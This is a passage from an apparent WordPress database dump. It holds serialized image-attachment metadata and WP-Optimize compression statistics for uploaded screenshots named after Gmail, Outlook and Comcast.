;i:153;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6159;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"gmail-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:2712;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:19:\"gmail-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7664;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:19:\"gmail-2-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12590;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:19:\"gmail-2-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9929;}s:8:\"tileview\";a:5:{s:4:\"file\";s:19:\"gmail-2-300x378.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:378;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8438;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(176117,267787,'original-file','2023/02/gmail-1-updraft-pre-smush-original.jpg'),(176118,267787,'smush-complete','1'),(176119,267787,'smush-info','The file was compressed from 65.08 KB to 54.95 KB saving 15.56 percent using WP-Optimize'),(176120,267787,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:66639;s:12:\"smushed-size\";i:56267;s:15:\"savings-percent\";d:15.56;s:10:\"sizes-info\";a:9:{s:4:\"full\";a:2:{s:8:\"original\";i:66639;s:10:\"compressed\";i:56267;}s:6:\"medium\";a:2:{s:8:\"original\";i:4327;s:10:\"compressed\";i:4261;}s:5:\"large\";a:2:{s:8:\"original\";i:32994;s:10:\"compressed\";i:31634;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:3757;s:10:\"compressed\";i:3691;}s:12:\"medium_large\";a:2:{s:8:\"original\";i:20077;s:10:\"compressed\";i:19567;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:11736;s:10:\"compressed\";i:11464;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:17608;s:10:\"compressed\";i:16946;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:12412;s:10:\"compressed\";i:12048;}s:8:\"tileview\";a:2:{s:8:\"original\";i:16891;s:10:\"compressed\";i:16245;}}}'),(176121,267788,'original-file','2023/02/gmail-2-updraft-pre-smush-original.jpg'),(176122,267788,'smush-complete','1'),(176123,267788,'smush-info','The file was compressed from 32.60 KB to 26.28 KB saving 19.38 percent using WP-Optimize'),(176124,267788,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:33378;s:12:\"smushed-size\";i:26909;s:15:\"savings-percent\";d:19.38;s:10:\"sizes-info\";a:7:{s:4:\"full\";a:2:{s:8:\"original\";i:33378;s:10:\"compressed\";i:26909;}s:6:\"medium\";a:2:{s:8:\"original\";i:6159;s:10:\"compressed\";i:6093;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:2712;s:10:\"compressed\";i:2646;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:7664;s:10:\"compressed\";i:7598;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:12590;s:10:\"compressed\";i:12167;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:9929;s:10:\"compressed\";i:9863;}s:8:\"tileview\";a:2:{s:8:\"original\";i:8438;s:10:\"compressed\";i:8372;}}}'),(176125,267786,'original-file','2023/02/gmail-01-updraft-pre-smush-original.jpg'),(176126,267786,'smush-complete','1'),(176127,267786,'smush-info','The file was compressed from 18.37 KB to 15.36 KB saving 16.37 percent using WP-Optimize'),(176128,267786,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:18809;s:12:\"smushed-size\";i:15730;s:15:\"savings-percent\";d:16.37;s:10:\"sizes-info\";a:7:{s:4:\"full\";a:2:{s:8:\"original\";i:18809;s:10:\"compressed\";i:15730;}s:6:\"medium\";a:2:{s:8:\"original\";i:9084;s:10:\"compressed\";i:9018;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:3797;s:10:\"compressed\";i:3731;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:9382;s:10:\"compressed\";i:9316;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:13009;s:10:\"compressed\";i:12778;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:10057;s:10:\"compressed\";i:9991;}s:8:\"tileview\";a:2:{s:8:\"original\";i:10698;s:10:\"compressed\";i:10492;}}}'),(176129,267789,'_wp_attached_file','2023/02/gmail-3.jpg'),(176130,267789,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:740;s:6:\"height\";i:570;s:4:\"file\";s:19:\"2023/02/gmail-3.jpg\";s:8:\"filesize\";i:59961;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:19:\"gmail-3-300x231.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:231;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10684;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"gmail-3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3418;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:19:\"gmail-3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10586;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:19:\"gmail-3-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19785;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:19:\"gmail-3-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13547;}s:8:\"tileview\";a:5:{s:4:\"file\";s:19:\"gmail-3-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:11278;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(176131,267790,'_wp_attached_file','2023/02/gmail-4.jpg'),(176132,267790,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1362;s:6:\"height\";i:450;s:4:\"file\";s:19:\"2023/02/gmail-4.jpg\";s:8:\"filesize\";i:79214;s:5:\"sizes\";a:8:{s:6:\"medium\";a:5:{s:4:\"file\";s:18:\"gmail-4-300x99.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:99;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4729;}s:5:\"large\";a:5:{s:4:\"file\";s:20:\"gmail-4-1024x338.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:37127;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"gmail-4-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3699;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:19:\"gmail-4-768x254.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:254;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21559;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:19:\"gmail-4-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:11669;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:19:\"gmail-4-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18986;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:19:\"gmail-4-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13309;}s:8:\"tileview\";a:5:{s:4:\"file\";s:19:\"gmail-4-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13030;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(176133,267790,'original-file','2023/02/gmail-4-updraft-pre-smush-original.jpg'),(176134,267790,'smush-complete','1'),(176135,267790,'smush-info','The file was compressed from 77.36 KB to 64.81 KB saving 16.22 percent using WP-Optimize'),(176136,267790,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:79214;s:12:\"smushed-size\";i:66364;s:15:\"savings-percent\";d:16.22;s:10:\"sizes-info\";a:9:{s:4:\"full\";a:2:{s:8:\"original\";i:79214;s:10:\"compressed\";i:66364;}s:6:\"medium\";a:2:{s:8:\"original\";i:4729;s:10:\"compressed\";i:4663;}s:5:\"large\";a:2:{s:8:\"original\";i:37127;s:10:\"compressed\";i:35630;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:3699;s:10:\"compressed\";i:3633;}s:12:\"medium_large\";a:2:{s:8:\"original\";i:21559;s:10:\"compressed\";i:20915;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:11669;s:10:\"compressed\";i:11433;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:18986;s:10:\"compressed\";i:18157;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:13309;s:10:\"compressed\";i:13105;}s:8:\"tileview\";a:2:{s:8:\"original\";i:13030;s:10:\"compressed\";i:12638;}}}'),(176137,267789,'original-file','2023/02/gmail-3-updraft-pre-smush-original.jpg'),(176138,267789,'smush-complete','1'),(176139,267789,'smush-info','The file was compressed from 58.56 KB to 49.28 KB saving 15.84 percent using WP-Optimize'),(176140,267789,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:59961;s:12:\"smushed-size\";i:50466;s:15:\"savings-percent\";d:15.84;s:10:\"sizes-info\";a:7:{s:4:\"full\";a:2:{s:8:\"original\";i:59961;s:10:\"compressed\";i:50466;}s:6:\"medium\";a:2:{s:8:\"original\";i:10684;s:10:\"compressed\";i:10343;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:3418;s:10:\"compressed\";i:3352;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:10586;s:10:\"compressed\";i:10259;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:19785;s:10:\"compressed\";i:18844;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:13547;s:10:\"compressed\";i:13029;}s:8:\"tileview\";a:2:{s:8:\"original\";i:11278;s:10:\"compressed\";i:10828;}}}'),(176164,267800,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1629;s:6:\"height\";i:425;s:4:\"file\";s:21:\"2023/02/comcast-2.jpg\";s:8:\"filesize\";i:116785;s:5:\"sizes\";a:9:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"comcast-2-300x78.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:78;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3296;}s:5:\"large\";a:5:{s:4:\"file\";s:22:\"comcast-2-1024x267.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19073;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:21:\"comcast-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:2922;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:21:\"comcast-2-768x200.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12496;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:21:\"comcast-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7422;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:21:\"comcast-2-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10391;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:21:\"comcast-2-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7579;}s:8:\"tileview\";a:5:{s:4:\"file\";s:21:\"comcast-2-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8437;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:22:\"comcast-2-1536x401.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:401;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:34124;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(176161,267799,'_wp_attached_file','2023/02/comcast-1a.jpg'),(176162,267799,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:235;s:6:\"height\";i:350;s:4:\"file\";s:22:\"2023/02/comcast-1a.jpg\";s:8:\"filesize\";i:41204;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:22:\"comcast-1a-201x300.jpg\";s:5:\"width\";i:201;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9870;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:22:\"comcast-1a-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4755;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:22:\"comcast-1a-235x300.jpg\";s:5:\"width\";i:235;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12216;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:22:\"comcast-1a-235x324.jpg\";s:5:\"width\";i:235;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12950;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:22:\"comcast-1a-235x260.jpg\";s:5:\"width\";i:235;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10446;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(176163,267800,'_wp_attached_file','2023/02/comcast-2.jpg'),(176141,267792,'_wp_attached_file','2023/02/gmail-01B.jpg'),(176142,267792,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:358;s:6:\"height\";i:353;s:4:\"file\";s:21:\"2023/02/gmail-01B.jpg\";s:8:\"filesize\";i:37155;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:21:\"gmail-01B-300x296.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:296;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9692;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:21:\"gmail-01B-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4095;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:21:\"gmail-01B-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9748;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:21:\"gmail-01B-358x324.jpg\";s:5:\"width\";i:358;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13400;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:21:\"gmail-01B-358x260.jpg\";s:5:\"width\";i:358;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:11387;}s:8:\"tileview\";a:5:{s:4:\"file\";s:21:\"gmail-01B-300x353.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:353;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12130;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(176143,267792,'original-file','2023/02/gmail-01B-updraft-pre-smush-original.jpg'),(176144,267792,'smush-complete','1'),(176145,267792,'smush-info','The file was compressed from 36.28 KB to 29.43 KB saving 18.9 percent using WP-Optimize'),(176146,267792,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:37155;s:12:\"smushed-size\";i:30133;s:15:\"savings-percent\";d:18.9;s:10:\"sizes-info\";a:7:{s:4:\"full\";a:2:{s:8:\"original\";i:37155;s:10:\"compressed\";i:30133;}s:6:\"medium\";a:2:{s:8:\"original\";i:9692;s:10:\"compressed\";i:9646;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:4095;s:10:\"compressed\";i:4049;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:9748;s:10:\"compressed\";i:9702;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:13400;s:10:\"compressed\";i:13149;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:11387;s:10:\"compressed\";i:11150;}s:8:\"tileview\";a:2:{s:8:\"original\";i:12130;s:10:\"compressed\";i:11771;}}}'),(176147,267793,'_wp_attached_file','2023/02/outlook-1.jpg'),(176148,267793,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:483;s:6:\"height\";i:302;s:4:\"file\";s:21:\"2023/02/outlook-1.jpg\";s:8:\"filesize\";i:91616;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:21:\"outlook-1-300x188.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:188;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13337;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:21:\"outlook-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6361;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:21:\"outlook-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18282;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:21:\"outlook-1-474x302.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:302;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:29960;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:21:\"outlook-1-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19446;}s:8:\"tileview\";a:5:{s:4:\"file\";s:21:\"outlook-1-300x302.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:302;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20905;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(176149,267794,'_wp_attached_file','2023/02/outlook-2.jpg'),(176150,267794,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:500;s:6:\"height\";i:633;s:4:\"file\";s:21:\"2023/02/outlook-2.jpg\";s:8:\"filesize\";i:148918;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:21:\"outlook-2-237x300.jpg\";s:5:\"width\";i:237;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13724;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:21:\"outlook-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4964;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:21:\"outlook-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16252;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:21:\"outlook-2-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25718;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:21:\"outlook-2-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18172;}s:8:\"tileview\";a:5:{s:4:\"file\";s:21:\"outlook-2-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20112;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(176151,267794,'original-file','2023/02/outlook-2-updraft-pre-smush-original.jpg'),(176152,267794,'smush-complete','1'),(176153,267794,'smush-info','The file was compressed from 145.43 KB to 110.52 KB saving 24 percent using WP-Optimize'),(176154,267794,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:148918;s:12:\"smushed-size\";i:113175;s:15:\"savings-percent\";d:24;s:10:\"sizes-info\";a:7:{s:4:\"full\";a:2:{s:8:\"original\";i:148918;s:10:\"compressed\";i:113175;}s:6:\"medium\";a:2:{s:8:\"original\";i:13724;s:10:\"compressed\";i:13494;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:4964;s:10:\"compressed\";i:4918;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:16252;s:10:\"compressed\";i:15962;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:25718;s:10:\"compressed\";i:25082;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:18172;s:10:\"compressed\";i:17812;}s:8:\"tileview\";a:2:{s:8:\"original\";i:20112;s:10:\"compressed\";i:19550;}}}'),(176155,267793,'original-file','2023/02/outlook-1-updraft-pre-smush-original.jpg'),(176156,267793,'smush-complete','1'),(176157,267793,'smush-info','The file was compressed from 89.47 KB to 69.75 KB saving 22.03 percent using WP-Optimize'),(176158,267793,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:91616;s:12:\"smushed-size\";i:71429;s:15:\"savings-percent\";d:22.03;s:10:\"sizes-info\";a:7:{s:4:\"full\";a:2:{s:8:\"original\";i:91616;s:10:\"compressed\";i:71429;}s:6:\"medium\";a:2:{s:8:\"original\";i:13337;s:10:\"compressed\";i:13002;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:6361;s:10:\"compressed\";i:6315;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:18282;s:10:\"compressed\";i:17738;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:29960;s:10:\"compressed\";i:28677;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:19446;s:10:\"compressed\";i:18874;}s:8:\"tileview\";a:2:{s:8:\"original\";i:20905;s:10:\"compressed\";i:20059;}}}'),(176165,267801,'_wp_attached_file','2023/02/comcast-3.jpg'),(176166,267801,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1002;s:6:\"height\";i:801;s:4:\"file\";s:21:\"2023/02/comcast-3.jpg\";s:8:\"filesize\";i:135309;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:21:\"comcast-3-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6377;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:21:\"comcast-3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:2158;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:21:\"comcast-3-768x614.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:614;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:28298;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:21:\"comcast-3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6220;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:21:\"comcast-3-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:11315;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:21:\"comcast-3-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7840;}s:8:\"tileview\";a:5:{s:4:\"file\";s:21:\"comcast-3-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6793;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0